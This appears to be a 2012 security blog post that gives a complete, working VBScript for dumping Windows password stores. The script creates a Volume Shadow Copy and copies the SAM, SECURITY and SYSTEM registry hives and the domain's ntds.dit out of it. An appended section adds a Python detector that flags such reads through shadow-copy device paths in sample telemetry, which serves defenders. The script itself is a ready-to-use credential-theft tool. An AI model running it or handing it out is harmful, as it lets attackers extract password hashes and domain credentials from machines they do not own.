2012-02-29

Dumping system hives and ntds.dit on live machines

This is nothing new if you follow security. A while back Tim Tomes and Mark Baggett discovered you could safely get at system hashes by dumping the system hives and the ntds.dit with the Volume Shadow Copy Service. Tim even wrote a VBScript that lets you interact with Windows VSS in a very detailed manner, even on workstations that don't include full vssadmin functionality. (http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html)

Well, being a rather lazy geek, I took his script and tooled it around a bit so it did everything for me. The result was a VBScript that runs on Windows Vista, 7, and 2008 that will dump the system hives and ntds.dit if found.

I am not a true code monkey so please forgive the sloppy code :)



' Setting variables
strComputer = "."
set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

' Start the Volume Shadow Copy service (no-op if it is already running)
set objListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
for each objService in objListOfServices
    objService.StartService()
next

' Create a new shadow copy of C:\ ; strShadowID receives the ID of the new copy.
' Create returns 0 on success, so bail out rather than copying from an unset path.
set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
varCreateResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)
if varCreateResult <> 0 then
    wscript.echo "Shadow copy creation failed, return code " & varCreateResult
    wscript.quit 1
end if

' Find the device path (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN) for the shadow copy
set colListItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
for each objListItem in colListItems
    if objListItem.ID = strShadowID then
        strShadowPath = objListItem.DeviceObject
    end if
next

' Copy the NTDS.DIT and SAM/SECURITY/SYSTEM hives from the shadow copy volume
set objShell = wscript.CreateObject("WScript.Shell")
strComputerName = objShell.ExpandEnvironmentStrings("%COMPUTERNAME%")
set objFSO = CreateObject("Scripting.FileSystemObject")
strDestDir = objFSO.GetAbsolutePathName(".")
' Turn \\?\GLOBALROOT\... into \\.\GLOBALROOT\... so FileSystemObject can open it
strShadowPath = replace(strShadowPath, "?", ".", 1, 1)
strDumpPaths = array("\windows\system32\config\", "\windows\system32\ntds\")
strDumpItems = array("SAM", "SECURITY", "SYSTEM", "ntds.dit")
for each lstDumpPaths in strDumpPaths
    for each lstDumpItems in strDumpItems
        strTempPath = strShadowPath & lstDumpPaths & lstDumpItems
        ' Only copy what exists: a workstation has no ntds.dit
        if objFSO.FileExists(strTempPath) then
            objFSO.CopyFile strTempPath, strDestDir & "\" & strComputerName & "-" & lstDumpItems, true
        end if
    next
next

' Delete the temporary shadow copy (only the one this script created, matched by ID)
set objDelItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
for each lstDelItem in objDelItems
    if lstDelItem.ID = strShadowID then
        varDelResult = lstDelItem.Delete_
    end if
next
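From the defender's side, the tell-tale of the technique above is not the shadow copy itself (backup software makes those all day) but reads of SAM, SECURITY, SYSTEM or ntds.dit through a shadow device path (`\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...`, or the `\\.\GLOBALROOT\...` form the script produces by swapping `?` for `.`). The following is an added example, not part of the original post or Tim's script: a small Python detector run over constructed file-access events. It assumes you have some telemetry (an EDR or a file-access audit feed) that records the full path a process opened; the dictionary schema and the sample events are constructed for the example and are not any real log format.

```python
import re
from collections import defaultdict
from datetime import datetime

# Hive and database names the script pulls out of the shadow volume.
SENSITIVE_FILES = {"sam", "security", "system", "ntds.dit"}

# Both spellings of a shadow device path: the raw DeviceObject form
# (\\?\GLOBALROOT\...) and the \\.\GLOBALROOT\... form used when opening it.
# Group 1 is the shadow device, group 2 the path inside the snapshot.
SHADOW_PATH_RE = re.compile(
    r"^\\\\[?.]\\GLOBALROOT\\(Device\\HarddiskVolumeShadowCopy\d+)\\(.+)$",
    re.IGNORECASE,
)


def classify_path(path):
    """Return (shadow_device, file_name) if `path` reads a sensitive file
    through a shadow device, else None."""
    m = SHADOW_PATH_RE.match(path)
    if not m:
        return None
    device, inner = m.group(1).lower(), m.group(2)
    name = inner.rsplit("\\", 1)[-1].lower()
    if name not in SENSITIVE_FILES:
        return None
    return device, name


def detect_shadow_hive_reads(events):
    """Group file-access events per (host, shadow device) and report the
    sensitive files touched. Returns {(host, device): [sorted file names]}.
    A hit on several hives from the same snapshot is the pattern of the
    script above; a single SYSTEM read could still be a backup agent."""
    hits = defaultdict(set)
    for ev in events:
        if ev.get("type") != "file":
            continue
        hit = classify_path(ev["path"])
        if hit:
            device, name = hit
            hits[(ev["host"], device)].add(name)
    return {key: sorted(names) for key, names in hits.items()}


# Constructed sample telemetry (schema and values invented for this example).
T0 = datetime(2012, 2, 29, 10, 0, 0)
SAMPLE_EVENTS = [
    {"host": "WS01", "time": T0, "type": "process",
     "cmdline": "cscript.exe dump.vbs"},  # hypothetical script name
    {"host": "WS01", "time": T0, "type": "file",
     "path": r"\\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SAM"},
    {"host": "WS01", "time": T0, "type": "file",
     "path": r"\\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SECURITY"},
    {"host": "WS01", "time": T0, "type": "file",
     "path": r"\\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SYSTEM"},
    {"host": "WS01", "time": T0, "type": "file",
     "path": r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\ntds\ntds.dit"},
    # Benign: a user document restored from the same snapshot.
    {"host": "WS01", "time": T0, "type": "file",
     "path": r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Users\alice\report.docx"},
    # Benign: the live hive opened through the normal path (locked, not copyable).
    {"host": "FS02", "time": T0, "type": "file",
     "path": r"C:\Windows\System32\config\SYSTEM"},
]


if __name__ == "__main__":
    for (host, device), names in detect_shadow_hive_reads(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(names)} read via {device}")
```

Matching on the path rather than on the process name is deliberate: the copy can be done by cscript, PowerShell or a compiled tool, but it always has to address the snapshot through a `HarddiskVolumeShadowCopy` device, and that string survives whatever front end is used.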